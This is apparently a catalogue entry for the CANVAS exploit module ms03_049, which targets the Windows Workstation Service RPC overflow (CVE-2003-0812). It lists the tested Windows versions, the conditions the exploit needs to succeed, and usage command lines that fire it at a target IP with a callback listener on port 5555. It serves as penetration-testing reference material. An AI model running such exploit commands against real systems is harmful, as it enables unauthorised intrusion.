Name | ms03_049 |
CVE | CVE-2003-0812 |
Exploit Pack | CANVAS |
Description | Microsoft Windows Workstation Service RPC Overflow |
Notes | CVE Name: CVE-2003-0812 VENDOR: Microsoft Notes: This exploit will crash the service if XP SP1a is running under Virtual PC or Virtual Server (Microsoft's virtualization platform) For this exploit to work on Windows 2000, the %WINDIR%\Debug\ must be writeable for Everyone. Which means either the Windows tree is on a FAT32 volume, or the default permissions of the directory have been changed. Tested on: Windows 2000 Professional SP4 English OOTB Windows 2000 Server SP0 English OOTB Windows 2000 Server SP4 English OOTB Windows 2000 Professional SP0 Simplified Chinese OOTB Windows 2000 Server SP4 Japanese OOTB Windows 2000 Professional SP0 German OOTB Windows 2000 Professional SP0 Spanish OOTB Windows XP Professional SP0 English OOTB Windows XP Professional SP1a English OOTB Usage: ./exploits/ms03_049/ms03_049.py -v 0 -t 10.10.11.132 -l 10.10.11.1 -d 5555 ./commandlineInterface.py -v 1 -p 5555 -i fromcreatethread VersionsAffected: Repeatability: MSADV: MS03-049 References: http://www.microsoft.com/technet/security/bulletin/MS03-049.mspx CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0812 Date public: 11/11/03 CVSS: 7.5 |
Learn more about the CANVAS Exploit Pack here: CANVAS |